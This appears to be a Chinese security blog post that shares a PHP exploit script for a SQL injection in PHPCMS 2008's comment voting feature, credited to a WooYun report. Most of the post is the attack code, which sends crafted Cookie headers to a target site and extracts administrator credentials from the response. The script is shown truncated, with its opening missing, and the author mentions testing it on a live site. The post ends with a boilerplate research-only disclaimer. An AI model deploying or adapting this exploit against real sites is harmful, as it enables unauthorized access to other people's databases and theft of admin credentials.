最近比较忙,一直没有时间更新博客,今天抽了点时间看了看乌云,看到了篇关于phpcms2008的老文章,文中提及了不少的EXP,发现其中的一些EXP我有的,但是也有一个没有,所以马上整了一个,把我没有的EXP也给整出来。。。。。写完了以后才发现,这个漏洞的利用其实还是需要cookie的,当时测试的网站是不需要cookie就可以利用,也懒得改了,反正现在phpcms2008的站也不多了。
漏洞EXP来源是这篇文章:http://www.wooyun.org/bugs/wooyun-2010-047476
作者是:pandas
注入EXP源码:
' . get_info($admin) . PHP_EOL; } } else { echo '报告爷,此站不存在此漏洞,请秒下一个!' . PHP_EOL; } //发送数据包函数 function send_pack($exp) { global $host, $path; $data = "GET " . $path . "/comment/comment.php?action=vote HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; //$data .= "User-Agent: Baiduspider\r\n"; $data .= "Cookie: $exp\r\n"; $data .= "Connection: Close\r\n\r\n"; //echo $data; $fp = @fsockopen($host, 80, $errno, $errstr, 10); //echo ini_get('default_socket_timeout');//默认超时时间为60秒 if (!$fp) { echo $errno . '-->' . $errstr . "\n"; exit('Could not connect to: ' . $host); } else { fwrite($fp, $data); $back = ''; while (!feof($fp)) { $back .= fread($fp, 1024); } fclose($fp); } return $back; } //提取返回信息 function get_info($info) { preg_match('/~(.*)~1/i', send_pack($info), $admin_match); if (preg_match('/charset=utf-8/i', send_pack($info))) { return iconv('utf-8', 'gbk//IGNORE', $admin_match[1]); } else { return $admin_match[1]; } } //时间统计函数 function func_time() { list($microsec, $sec) = explode(' ', microtime()); return $microsec + $sec; } echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。'; ?>
执行EXP后的截图:
文中提及的另外几个EXP:
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论